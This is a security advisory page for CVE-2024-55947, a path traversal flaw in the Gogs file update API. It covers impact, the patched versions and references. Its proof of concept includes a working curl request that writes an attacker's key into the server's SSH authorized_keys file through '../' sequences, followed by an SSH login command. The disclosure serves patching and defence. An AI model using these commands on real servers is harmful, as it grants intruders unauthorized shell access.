logo

Database

Lack of data validation - Path Traversal In gogs.io/gogs

Description

Path Traversal in file update API in gogs

Impact

The malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server.

Patches

Writing files outside repository Git directory has been prohibited via the repository file update API (https://github.com/gogs/gogs/pull/7859). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.

Workarounds

No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.

References

n/a

Proof of Concept

    Generate a Personal Access Tokens

    Edit any file on the server with this

    curl -v --path-as-is -X PUT --url "http://localhost:10880/api/v1/repos/Test/bbcc/contents/../../../../../../../../home/git/.ssh/authorized_keys" \
-H "Authorization: token eaac23cf58fc76bbaecd686ec52cd44d903db9bf" \
-H "Content-Type: application/json" \
--data '{
  "message": "an",
  "content": "<base64encoded: your ssh pub key>"
}'

    ssh connect to remote server

    ssh -i temp git@localhost -p 10022

For more information

If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2024-559472. NVD-2024-559473. OSV-2024-559474. GHSA-qf5v-rp47-55gg5. GCVE-2024-55947

References

1. https://github.com/gogs/gogs/security/advisories/GHSA-qf5v-rp47-55gg2. https://github.com/gogs/gogs/issues/75823. https://github.com/gogs/gogs/pull/78594. https://github.com/gogs/gogs/commit/9a9388ace25bd646f5098cb9193d983332c34e41

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.